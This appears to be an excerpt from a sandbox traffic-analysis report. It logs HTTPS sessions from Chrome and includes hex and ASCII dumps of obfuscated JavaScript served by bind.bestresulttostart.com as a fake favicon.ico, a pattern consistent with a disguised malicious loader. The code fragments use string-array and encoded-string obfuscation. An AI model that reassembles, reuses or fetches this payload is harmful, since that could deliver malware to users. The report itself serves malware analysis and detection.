      2024-04-25 09:19:42 UTC1369INData Raw: 78 35 31 33 38 39 63 28 2d 30 78 39 34 2c 27 33 38 33 6d 27 2c 2d 30 78 62 65 2c 2d 30 78 63 34 2c 2d 30 78 62 62 29 2b 5f 30 78 35 65 66 30 64 62 28 30 78 33 61 63 2c 27 4c 4d 6e 4b 27 2c 30 78 33 64 31 2c 30 78 33 64 39 2c 30 78 33 64 32 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 34 64 2c 30 78 33 32 38 2c 30 78 33 33 62 2c 30 78 33 35 63 29 2b 5f 30 78 35 65 66 30 64 62 28 30 78 33 65 39 2c 27 68 4c 6c 68 27 2c 30 78 33 65 30 2c 30 78 33 62 31 2c 30 78 33 65 33 29 2b 5f 30 78 31 30 61 34 36 63 28 27 68 5d 66 7a 27 2c 30 78 33 61 33 2c 30 78 33 37 63 2c 30 78 33 61 32 2c 30 78 33 36 39 29 2b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 62 32 2c 27 54 5b 6b 62 27 2c 2d 30 78 62 37 2c 2d 30 78 61 35 2c 2d 30 78 62 64 29 2b 5f 30 78 35 65
      Data Ascii: x51389c(-0x94,'383m',-0xbe,-0xc4,-0xbb)+_0x5ef0db(0x3ac,'LMnK',0x3d1,0x3d9,0x3d2)+_0x10a46c('qMqR',0x34d,0x328,0x33b,0x35c)+_0x5ef0db(0x3e9,'hLlh',0x3e0,0x3b1,0x3e3)+_0x10a46c('h]fz',0x3a3,0x37c,0x3a2,0x369)+_0x51389c(-0xb2,'T[kb',-0xb7,-0xa5,-0xbd)+_0x5e
      2024-04-25 09:19:42 UTC1369INData Raw: 2c 30 78 34 61 61 2c 30 78 34 39 36 2c 30 78 34 65 31 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 30 33 2c 30 78 32 63 36 2c 30 78 33 30 34 2c 30 78 32 66 63 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 36 65 62 31 30 28 27 68 5d 66 7a 27 2c 30 78 34 64 34 2c 30 78 34 66 35 2c 30 78 34 65 37 2c 30 78 34 61 34 29 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 65 63 39 66 28 5f 30 78 31 64 39 38 33 32 2c 5f 30 78 64 35 32 30 35 62 2c 5f 30 78 32 33 32 35 36 64 2c 5f 30 78 32 31 65 32 32 34 2c 5f 30 78 35 32 62 64 35 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 31 64 39 38 33 32 2d 30 78 39 37 2c 5f 30 78 64 35 32 30 35 62 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 36 65 62 31 30 28 5f 30 78 35 33 37 35
      Data Ascii: ,0x4aa,0x496,0x4e1)+_0x10a46c('qMqR',0x303,0x2c6,0x304,0x2fc)](_0x159d5c[_0x56eb10('h]fz',0x4d4,0x4f5,0x4e7,0x4a4)]);function _0x3eec9f(_0x1d9832,_0xd5205b,_0x23256d,_0x21e224,_0x52bd5e){return _0x58cd(_0x1d9832-0x97,_0xd5205b);}function _0x56eb10(_0x5375
      2024-04-25 09:19:42 UTC1369INData Raw: 27 62 6e 74 75 27 2c 30 78 32 35 65 2c 30 78 32 36 33 2c 30 78 32 38 34 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 66 37 2c 27 70 44 61 4f 27 2c 2d 30 78 31 32 39 2c 2d 30 78 31 31 65 2c 2d 30 78 64 61 29 5d 29 29 2c 21 5b 5d 29 29 7b 69 66 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 5d 6f 58 67 27 2c 30 78 33 36 65 2c 30 78 33 36 34 2c 30 78 33 35 34 2c 30 78 33 34 34 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 65 66 30 64 62 28 30 78 33 64 66 2c 27 5a 77 79 72 27 2c 30 78 34 33 66 2c 30 78 34 31 36 2c 30 78 33 65 36 29 5d 2c 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 66 35 2c 27 34 33 5e 79 27 2c 2d 30 78 63 30 2c 2d 30 78 31 32 37 2c 2d 30 78 66 63 29 5d 29 29 72
      Data Ascii: 'bntu',0x25e,0x263,0x284)](_0x159d5c[_0x51389c(-0xf7,'pDaO',-0x129,-0x11e,-0xda)])),![])){if(_0x159d5c[_0x10a46c(']oXg',0x36e,0x364,0x354,0x344)](_0x159d5c[_0x5ef0db(0x3df,'Zwyr',0x43f,0x416,0x3e6)],_0x159d5c[_0x51389c(-0xf5,'43^y',-0xc0,-0x127,-0xfc)]))r
      2024-04-25 09:19:42 UTC1369INData Raw: 32 36 38 2c 27 54 55 56 66 27 2c 30 78 32 38 61 2c 30 78 32 36 65 2c 30 78 32 38 38 29 2b 27 65 27 5d 28 29 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 24 52 4f 6b 27 2c 30 78 33 30 62 2c 30 78 33 30 63 2c 30 78 32 66 30 2c 30 78 33 30 39 29 5d 28 5f 30 78 34 34 62 62 37 66 2c 27 27 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 65 66 30 64 62 28 30 78 34 31 32 2c 27 33 38 33 6d 27 2c 30 78 34 32 37 2c 30 78 33 66 36 2c 30 78 33 66 32 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 33 65 65 63 39 66 28 30 78 32 37 63 2c 27 4f 55 46 73 27 2c 30 78 32 39 30 2c 30 78 32 61 32 2c 30 78 32 34 66 29 5d 2c 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 33 65 65 63 39 66 28 30 78 32 36 39 2c 27 42 24 5a 59 27 2c 30 78 32 39 63 2c 30 78 32 36 65
      Data Ascii: 268,'TUVf',0x28a,0x26e,0x288)+'e']()):_0x159d5c[_0x10a46c('$ROk',0x30b,0x30c,0x2f0,0x309)](_0x44bb7f,''):_0x159d5c[_0x5ef0db(0x412,'383m',0x427,0x3f6,0x3f2)](_0x159d5c[_0x3eec9f(0x27c,'OUFs',0x290,0x2a2,0x24f)],_0x159d5c[_0x3eec9f(0x269,'B$ZY',0x29c,0x26e
      2024-04-25 09:19:42 UTC1369INData Raw: 27 76 38 6b 6c 57 50 72 44 6e 61 27 2c 27 46 5a 50 78 57 37 2f 63 52 71 27 2c 27 71 53 6f 2b 57 37 56 64 47 38 6b 50 27 2c 27 57 36 5a 64 48 4c 31 30 57 50 69 27 2c 27 57 36 4f 78 42 47 27 2c 27 66 4d 66 51 27 2c 27 57 34 47 59 57 52 74 63 52 53 6b 41 27 2c 27 57 36 4b 32 57 50 4b 43 27 2c 27 66 38 6f 72 65 73 4f 2f 71 47 46 63 47 6d 6b 6b 27 2c 27 76 53 6b 34 57 51 72 72 57 51 4f 27 2c 27 57 34 52 63 55 6d 6f 4a 43 58 30 27 2c 27 73 4a 39 48 57 4f 75 58 72 38 6b 38 61 4e 30 27 2c 27 65 6d 6f 65 79 77 4e 64 54 73 56 64 4b 30 30 4b 27 2c 27 66 53 6f 68 71 4a 6c 64 4a 43 6f 64 65 6d 6f 47 57 36 34 70 7a 4d 61 27 2c 27 57 51 6c 64 4d 59 42 64 53 68 2f 63 55 31 70 64 48 53 6b 6f 27 2c 27 73 53 6b 4b 62 31 68 64 4c 57 27 2c 27 57 51 33 64 4b 67 4a 64 4b 43 6f
      Data Ascii: 'v8klWPrDna','FZPxW7/cRq','qSo+W7VdG8kP','W6ZdHL10WPi','W6OxBG','fMfQ','W4GYWRtcRSkA','W6K2WPKC','f8oresO/qGFcGmkk','vSk4WQrrWQO','W4RcUmoJCX0','sJ9HWOuXr8k8aN0','emoeywNdTsVdK00K','fSohqJldJCodemoGW64pzMa','WQldMYBdSh/cU1pdHSko','sSkKb1hdLW','WQ3dKgJdKCo
      2024-04-25 09:19:42 UTC1369INData Raw: 4f 57 50 39 57 57 50 79 27 2c 27 57 52 6a 73 6c 38 6b 69 6e 38 6f 4f 57 36 30 45 42 59 4c 37 27 2c 27 57 36 64 64 49 43 6f 2b 64 61 27 2c 27 57 52 64 63 47 74 58 7a 57 52 7a 41 57 34 68 63 49 43 6f 44 27 2c 27 74 38 6b 52 57 36 62 65 71 57 27 2c 27 57 51 53 70 57 35 4a 64 54 48 79 27 2c 27 57 37 58 75 6f 32 46 63 4d 61 27 2c 27 71 38 6b 6e 57 52 7a 32 57 51 4f 27 2c 27 73 38 6b 2f 6d 65 42 63 55 57 27 2c 27 78 38 6b 35 6a 43 6f 5a 57 36 71 27 2c 27 41 38 6b 54 57 50 4e 63 4f 43 6f 5a 27 2c 27 57 34 2f 63 50 6d 6b 72 57 35 78 63 4b 61 27 2c 27 57 51 79 59 57 35 75 64 75 57 27 2c 27 62 6d 6b 50 57 52 58 64 57 52 75 27 2c 27 57 37 42 64 48 4d 44 35 57 4f 43 27 5d 3b 5f 30 78 35 39 64 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 30 78 61 66
      Data Ascii: OWP9WWPy','WRjsl8kin8oOW60EBYL7','W6ddICo+da','WRdcGtXzWRzAW4hcICoD','t8kRW6beqW','WQSpW5JdTHy','W7Xuo2FcMa','q8knWRz2WQO','s8k/meBcUW','x8k5jCoZW6q','A8kTWPNcOCoZ','W4/cPmkrW5xcKa','WQyYW5uduW','bmkPWRXdWRu','W7BdHMD5WOC'];_0x59db=function(){return _0xaf
      2024-04-25 09:19:42 UTC1369INData Raw: 34 62 65 62 34 37 28 27 6a 65 4c 59 27 2c 2d 30 78 31 32 33 2c 2d 30 78 31 33 34 2c 2d 30 78 31 35 33 2c 2d 30 78 31 37 34 29 2b 5f 30 78 31 33 65 62 39 34 28 2d 30 78 63 2c 30 78 39 2c 27 31 36 56 62 27 2c 30 78 32 31 2c 2d 30 78 31 32 29 2c 5f 30 78 33 34 66 36 37 66 3d 5f 30 78 34 62 65 62 34 37 28 27 7a 72 47 57 27 2c 2d 30 78 66 66 2c 2d 30 78 66 30 2c 2d 30 78 66 35 2c 2d 30 78 62 64 29 2b 5f 30 78 35 39 38 65 38 31 28 30 78 31 37 62 2c 27 77 51 4d 33 27 2c 30 78 31 63 65 2c 30 78 31 61 39 2c 30 78 31 63 63 29 2b 27 73 27 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 35 34 65 66 38 36 2c 5f 30 78 31 31 32 63 65 66 29 7b 76 61 72 20 5f 30 78 34 65 64 31 65 32 3d 5f 30 78 35 39 64 62 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64
      Data Ascii: 4beb47('jeLY',-0x123,-0x134,-0x153,-0x174)+_0x13eb94(-0xc,0x9,'16Vb',0x21,-0x12),_0x34f67f=_0x4beb47('zrGW',-0xff,-0xf0,-0xf5,-0xbd)+_0x598e81(0x17b,'wQM3',0x1ce,0x1a9,0x1cc)+'s';function _0x58cd(_0x54ef86,_0x112cef){var _0x4ed1e2=_0x59db();return _0x58cd
      2024-04-25 09:19:42 UTC1369INData Raw: 78 32 65 65 33 64 64 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 36 62 37 32 30 2c 5f 30 78 33 63 64 30 30 38 29 7b 76 61 72 20 5f 30 78 31 62 62 38 32 63 3d 5b 5d 2c 5f 30 78 31 63 34 61 39 65 3d 2d 30 78 31 64 37 63 2b 30 78 31 38 62 2a 30 78 37 2b 30 78 31 32 61 66 2c 5f 30 78 64 62 32 33 37 64 2c 5f 30 78 33 30 31 30 33 38 3d 27 27 3b 5f 30 78 33 36 62 37 32 30 3d 5f 30 78 35 34 30 30 34 38 28 5f 30 78 33 36 62 37 32 30 29 3b 76 61 72 20 5f 30 78 32 34 37 30 61 66 3b 66 6f 72 28 5f 30 78 32 34 37 30 61 66 3d 30 78 31 37 65 2a 30 78 34 2b 2d 30 78 35 65 2a 2d 30 78 35 31 2b 30 78 65 2a 2d 30 78 32 38 64 3b 5f 30 78 32 34 37 30 61 66 3c 2d 30 78 31 61 33 63 2b 2d 30 78 31 2a 30 78 31 32 63 62 2b 30 78 31 2a 30 78 32 65 30 37 3b 5f 30 78 32 34 37 30 61 66
      Data Ascii: x2ee3dd=function(_0x36b720,_0x3cd008){var _0x1bb82c=[],_0x1c4a9e=-0x1d7c+0x18b*0x7+0x12af,_0xdb237d,_0x301038='';_0x36b720=_0x540048(_0x36b720);var _0x2470af;for(_0x2470af=0x17e*0x4+-0x5e*-0x51+0xe*-0x28d;_0x2470af<-0x1a3c+-0x1*0x12cb+0x1*0x2e07;_0x2470af


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.549714193.163.7.1134434324C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-04-25 09:19:43 UTC361OUTGET /favicon.ico HTTP/1.1
      Host: bind.bestresulttostart.com
      Connection: keep-alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: */*
      Sec-Fetch-Site: none
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-04-25 09:19:44 UTC263INHTTP/1.1 200 OK
      Server: nginx
      Date: Thu, 25 Apr 2024 09:19:44 GMT
      Content-Type: application/javascript; charset=utf-8
      Transfer-Encoding: chunked
      Connection: close
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Strict-Transport-Security: max-age=31536000;
      2024-04-25 09:19:44 UTC1106INData Raw: 33 35 64 61 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 33 61 31 39 2c 5f 30 78 32 64 63 64 31 39 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 38 62 36 33 34 28 5f 30 78 33 63 36 65 64 38 2c 5f 30 78 31 30 32 32 34 36 2c 5f 30 78 39 61 31 61 62 62 2c 5f 30 78 33 38 39 36 36 31 2c 5f 30 78 35 64 36 30 36 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 31 30 32 32 34 36 2d 20 2d 30 78 65 63 2c 5f 30 78 33 63 36 65 64 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 35 64 30 37 61 28 5f 30 78 31 37 33 37 66 31 2c 5f 30 78 34 34 38 64 37 65 2c 5f 30 78 33 66 63 33 38 35 2c 5f 30 78 32 33 35 66 37 34 2c 5f 30 78 34 34 33 39 35 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 34 34 33 39 35 37 2d 20 2d 30 78 32 65 32 2c 5f
      Data Ascii: 35da(function(_0x123a19,_0x2dcd19){function _0x58b634(_0x3c6ed8,_0x102246,_0x9a1abb,_0x389661,_0x5d6061){return _0x58cd(_0x102246- -0xec,_0x3c6ed8);}function _0x15d07a(_0x1737f1,_0x448d7e,_0x3fc385,_0x235f74,_0x443957){return _0x58cd(_0x443957- -0x2e2,_
      2024-04-25 09:19:44 UTC1369INData Raw: 2c 27 5e 44 23 61 27 2c 2d 30 78 64 32 29 29 2f 28 30 78 32 34 66 33 2b 2d 30 78 31 39 35 66 2b 30 78 61 65 2a 2d 30 78 31 31 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 38 62 36 33 34 28 27 33 32 63 28 27 2c 30 78 31 32 65 2c 30 78 31 31 32 2c 30 78 31 33 64 2c 30 78 31 34 63 29 29 2f 28 2d 30 78 34 2a 30 78 34 61 2b 2d 30 78 31 61 35 31 2b 30 78 36 65 2a 30 78 34 30 29 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 64 33 2c 2d 30 78 31 32 64 2c 2d 30 78 63 36 2c 27 77 51 4d 33 27 2c 2d 30 78 66 35 29 29 2f 28 30 78 63 64 2a 30 78 31 63 2b 2d 30 78 33 65 39 2a 2d 30 78 31 2b 2d 30 78 31 61 34 64 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 66 64 2c 2d 30 78 63 64 2c 2d 30 78 65 61 2c 27 54 55 56
      Data Ascii: ,'^D#a',-0xd2))/(0x24f3+-0x195f+0xae*-0x11)*(parseInt(_0x58b634('32c(',0x12e,0x112,0x13d,0x14c))/(-0x4*0x4a+-0x1a51+0x6e*0x40))+parseInt(_0x15d07a(-0xd3,-0x12d,-0xc6,'wQM3',-0xf5))/(0xcd*0x1c+-0x3e9*-0x1+-0x1a4d)*(parseInt(_0x15d07a(-0xfd,-0xcd,-0xea,'TUV
      2024-04-25 09:19:44 UTC1369INData Raw: 78 35 31 33 38 39 63 28 2d 30 78 39 34 2c 27 33 38 33 6d 27 2c 2d 30 78 62 65 2c 2d 30 78 63 34 2c 2d 30 78 62 62 29 2b 5f 30 78 35 65 66 30 64 62 28 30 78 33 61 63 2c 27 4c 4d 6e 4b 27 2c 30 78 33 64 31 2c 30 78 33 64 39 2c 30 78 33 64 32 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 34 64 2c 30 78 33 32 38 2c 30 78 33 33 62 2c 30 78 33 35 63 29 2b 5f 30 78 35 65 66 30 64 62 28 30 78 33 65 39 2c 27 68 4c 6c 68 27 2c 30 78 33 65 30 2c 30 78 33 62 31 2c 30 78 33 65 33 29 2b 5f 30 78 31 30 61 34 36 63 28 27 68 5d 66 7a 27 2c 30 78 33 61 33 2c 30 78 33 37 63 2c 30 78 33 61 32 2c 30 78 33 36 39 29 2b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 62 32 2c 27 54 5b 6b 62 27 2c 2d 30 78 62 37 2c 2d 30 78 61 35 2c 2d 30 78 62 64 29 2b 5f 30 78 35 65
      Data Ascii: x51389c(-0x94,'383m',-0xbe,-0xc4,-0xbb)+_0x5ef0db(0x3ac,'LMnK',0x3d1,0x3d9,0x3d2)+_0x10a46c('qMqR',0x34d,0x328,0x33b,0x35c)+_0x5ef0db(0x3e9,'hLlh',0x3e0,0x3b1,0x3e3)+_0x10a46c('h]fz',0x3a3,0x37c,0x3a2,0x369)+_0x51389c(-0xb2,'T[kb',-0xb7,-0xa5,-0xbd)+_0x5e
      2024-04-25 09:19:44 UTC1369INData Raw: 2c 30 78 34 61 61 2c 30 78 34 39 36 2c 30 78 34 65 31 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 30 33 2c 30 78 32 63 36 2c 30 78 33 30 34 2c 30 78 32 66 63 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 36 65 62 31 30 28 27 68 5d 66 7a 27 2c 30 78 34 64 34 2c 30 78 34 66 35 2c 30 78 34 65 37 2c 30 78 34 61 34 29 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 65 63 39 66 28 5f 30 78 31 64 39 38 33 32 2c 5f 30 78 64 35 32 30 35 62 2c 5f 30 78 32 33 32 35 36 64 2c 5f 30 78 32 31 65 32 32 34 2c 5f 30 78 35 32 62 64 35 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 31 64 39 38 33 32 2d 30 78 39 37 2c 5f 30 78 64 35 32 30 35 62 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 36 65 62 31 30 28 5f 30 78 35 33 37 35
      Data Ascii: ,0x4aa,0x496,0x4e1)+_0x10a46c('qMqR',0x303,0x2c6,0x304,0x2fc)](_0x159d5c[_0x56eb10('h]fz',0x4d4,0x4f5,0x4e7,0x4a4)]);function _0x3eec9f(_0x1d9832,_0xd5205b,_0x23256d,_0x21e224,_0x52bd5e){return _0x58cd(_0x1d9832-0x97,_0xd5205b);}function _0x56eb10(_0x5375
      2024-04-25 09:19:44 UTC1369INData Raw: 27 62 6e 74 75 27 2c 30 78 32 35 65 2c 30 78 32 36 33 2c 30 78 32 38 34 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 66 37 2c 27 70 44 61 4f 27 2c 2d 30 78 31 32 39 2c 2d 30 78 31 31 65 2c 2d 30 78 64 61 29 5d 29 29 2c 21 5b 5d 29 29 7b 69 66 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 5d 6f 58 67 27 2c 30 78 33 36 65 2c 30 78 33 36 34 2c 30 78 33 35 34 2c 30 78 33 34 34 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 65 66 30 64 62 28 30 78 33 64 66 2c 27 5a 77 79 72 27 2c 30 78 34 33 66 2c 30 78 34 31 36 2c 30 78 33 65 36 29 5d 2c 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 66 35 2c 27 34 33 5e 79 27 2c 2d 30 78 63 30 2c 2d 30 78 31 32 37 2c 2d 30 78 66 63 29 5d 29 29 72
      Data Ascii: 'bntu',0x25e,0x263,0x284)](_0x159d5c[_0x51389c(-0xf7,'pDaO',-0x129,-0x11e,-0xda)])),![])){if(_0x159d5c[_0x10a46c(']oXg',0x36e,0x364,0x354,0x344)](_0x159d5c[_0x5ef0db(0x3df,'Zwyr',0x43f,0x416,0x3e6)],_0x159d5c[_0x51389c(-0xf5,'43^y',-0xc0,-0x127,-0xfc)]))r
      2024-04-25 09:19:44 UTC1369INData Raw: 32 36 38 2c 27 54 55 56 66 27 2c 30 78 32 38 61 2c 30 78 32 36 65 2c 30 78 32 38 38 29 2b 27 65 27 5d 28 29 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 24 52 4f 6b 27 2c 30 78 33 30 62 2c 30 78 33 30 63 2c 30 78 32 66 30 2c 30 78 33 30 39 29 5d 28 5f 30 78 34 34 62 62 37 66 2c 27 27 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 65 66 30 64 62 28 30 78 34 31 32 2c 27 33 38 33 6d 27 2c 30 78 34 32 37 2c 30 78 33 66 36 2c 30 78 33 66 32 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 33 65 65 63 39 66 28 30 78 32 37 63 2c 27 4f 55 46 73 27 2c 30 78 32 39 30 2c 30 78 32 61 32 2c 30 78 32 34 66 29 5d 2c 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 33 65 65 63 39 66 28 30 78 32 36 39 2c 27 42 24 5a 59 27 2c 30 78 32 39 63 2c 30 78 32 36 65
      Data Ascii: 268,'TUVf',0x28a,0x26e,0x288)+'e']()):_0x159d5c[_0x10a46c('$ROk',0x30b,0x30c,0x2f0,0x309)](_0x44bb7f,''):_0x159d5c[_0x5ef0db(0x412,'383m',0x427,0x3f6,0x3f2)](_0x159d5c[_0x3eec9f(0x27c,'OUFs',0x290,0x2a2,0x24f)],_0x159d5c[_0x3eec9f(0x269,'B$ZY',0x29c,0x26e
      2024-04-25 09:19:44 UTC1369INData Raw: 27 76 38 6b 6c 57 50 72 44 6e 61 27 2c 27 46 5a 50 78 57 37 2f 63 52 71 27 2c 27 71 53 6f 2b 57 37 56 64 47 38 6b 50 27 2c 27 57 36 5a 64 48 4c 31 30 57 50 69 27 2c 27 57 36 4f 78 42 47 27 2c 27 66 4d 66 51 27 2c 27 57 34 47 59 57 52 74 63 52 53 6b 41 27 2c 27 57 36 4b 32 57 50 4b 43 27 2c 27 66 38 6f 72 65 73 4f 2f 71 47 46 63 47 6d 6b 6b 27 2c 27 76 53 6b 34 57 51 72 72 57 51 4f 27 2c 27 57 34 52 63 55 6d 6f 4a 43 58 30 27 2c 27 73 4a 39 48 57 4f 75 58 72 38 6b 38 61 4e 30 27 2c 27 65 6d 6f 65 79 77 4e 64 54 73 56 64 4b 30 30 4b 27 2c 27 66 53 6f 68 71 4a 6c 64 4a 43 6f 64 65 6d 6f 47 57 36 34 70 7a 4d 61 27 2c 27 57 51 6c 64 4d 59 42 64 53 68 2f 63 55 31 70 64 48 53 6b 6f 27 2c 27 73 53 6b 4b 62 31 68 64 4c 57 27 2c 27 57 51 33 64 4b 67 4a 64 4b 43 6f
      Data Ascii: 'v8klWPrDna','FZPxW7/cRq','qSo+W7VdG8kP','W6ZdHL10WPi','W6OxBG','fMfQ','W4GYWRtcRSkA','W6K2WPKC','f8oresO/qGFcGmkk','vSk4WQrrWQO','W4RcUmoJCX0','sJ9HWOuXr8k8aN0','emoeywNdTsVdK00K','fSohqJldJCodemoGW64pzMa','WQldMYBdSh/cU1pdHSko','sSkKb1hdLW','WQ3dKgJdKCo
      2024-04-25 09:19:44 UTC1369INData Raw: 4f 57 50 39 57 57 50 79 27 2c 27 57 52 6a 73 6c 38 6b 69 6e 38 6f 4f 57 36 30 45 42 59 4c 37 27 2c 27 57 36 64 64 49 43 6f 2b 64 61 27 2c 27 57 52 64 63 47 74 58 7a 57 52 7a 41 57 34 68 63 49 43 6f 44 27 2c 27 74 38 6b 52 57 36 62 65 71 57 27 2c 27 57 51 53 70 57 35 4a 64 54 48 79 27 2c 27 57 37 58 75 6f 32 46 63 4d 61 27 2c 27 71 38 6b 6e 57 52 7a 32 57 51 4f 27 2c 27 73 38 6b 2f 6d 65 42 63 55 57 27 2c 27 78 38 6b 35 6a 43 6f 5a 57 36 71 27 2c 27 41 38 6b 54 57 50 4e 63 4f 43 6f 5a 27 2c 27 57 34 2f 63 50 6d 6b 72 57 35 78 63 4b 61 27 2c 27 57 51 79 59 57 35 75 64 75 57 27 2c 27 62 6d 6b 50 57 52 58 64 57 52 75 27 2c 27 57 37 42 64 48 4d 44 35 57 4f 43 27 5d 3b 5f 30 78 35 39 64 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 30 78 61 66
      Data Ascii: OWP9WWPy','WRjsl8kin8oOW60EBYL7','W6ddICo+da','WRdcGtXzWRzAW4hcICoD','t8kRW6beqW','WQSpW5JdTHy','W7Xuo2FcMa','q8knWRz2WQO','s8k/meBcUW','x8k5jCoZW6q','A8kTWPNcOCoZ','W4/cPmkrW5xcKa','WQyYW5uduW','bmkPWRXdWRu','W7BdHMD5WOC'];_0x59db=function(){return _0xaf
      2024-04-25 09:19:44 UTC1369INData Raw: 34 62 65 62 34 37 28 27 6a 65 4c 59 27 2c 2d 30 78 31 32 33 2c 2d 30 78 31 33 34 2c 2d 30 78 31 35 33 2c 2d 30 78 31 37 34 29 2b 5f 30 78 31 33 65 62 39 34 28 2d 30 78 63 2c 30 78 39 2c 27 31 36 56 62 27 2c 30 78 32 31 2c 2d 30 78 31 32 29 2c 5f 30 78 33 34 66 36 37 66 3d 5f 30 78 34 62 65 62 34 37 28 27 7a 72 47 57 27 2c 2d 30 78 66 66 2c 2d 30 78 66 30 2c 2d 30 78 66 35 2c 2d 30 78 62 64 29 2b 5f 30 78 35 39 38 65 38 31 28 30 78 31 37 62 2c 27 77 51 4d 33 27 2c 30 78 31 63 65 2c 30 78 31 61 39 2c 30 78 31 63 63 29 2b 27 73 27 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 35 34 65 66 38 36 2c 5f 30 78 31 31 32 63 65 66 29 7b 76 61 72 20 5f 30 78 34 65 64 31 65 32 3d 5f 30 78 35 39 64 62 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64
      Data Ascii: 4beb47('jeLY',-0x123,-0x134,-0x153,-0x174)+_0x13eb94(-0xc,0x9,'16Vb',0x21,-0x12),_0x34f67f=_0x4beb47('zrGW',-0xff,-0xf0,-0xf5,-0xbd)+_0x598e81(0x17b,'wQM3',0x1ce,0x1a9,0x1cc)+'s';function _0x58cd(_0x54ef86,_0x112cef){var _0x4ed1e2=_0x59db();return _0x58cd
      2024-04-25 09:19:44 UTC1369INData Raw: 78 32 65 65 33 64 64 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 36 62 37 32 30 2c 5f 30 78 33 63 64 30 30 38 29 7b 76 61 72 20 5f 30 78 31 62 62 38 32 63 3d 5b 5d 2c 5f 30 78 31 63 34 61 39 65 3d 2d 30 78 31 64 37 63 2b 30 78 31 38 62 2a 30 78 37 2b 30 78 31 32 61 66 2c 5f 30 78 64 62 32 33 37 64 2c 5f 30 78 33 30 31 30 33 38 3d 27 27 3b 5f 30 78 33 36 62 37 32 30 3d 5f 30 78 35 34 30 30 34 38 28 5f 30 78 33 36 62 37 32 30 29 3b 76 61 72 20 5f 30 78 32 34 37 30 61 66 3b 66 6f 72 28 5f 30 78 32 34 37 30 61 66 3d 30 78 31 37 65 2a 30 78 34 2b 2d 30 78 35 65 2a 2d 30 78 35 31 2b 30 78 65 2a 2d 30 78 32 38 64 3b 5f 30 78 32 34 37 30 61 66 3c 2d 30 78 31 61 33 63 2b 2d 30 78 31 2a 30 78 31 32 63 62 2b 30 78 31 2a 30 78 32 65 30 37 3b 5f 30 78 32 34 37 30 61 66
      Data Ascii: x2ee3dd=function(_0x36b720,_0x3cd008){var _0x1bb82c=[],_0x1c4a9e=-0x1d7c+0x18b*0x7+0x12af,_0xdb237d,_0x301038='';_0x36b720=_0x540048(_0x36b720);var _0x2470af;for(_0x2470af=0x17e*0x4+-0x5e*-0x51+0xe*-0x28d;_0x2470af<-0x1a3c+-0x1*0x12cb+0x1*0x2e07;_0x2470af


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.54971523.216.73.151443
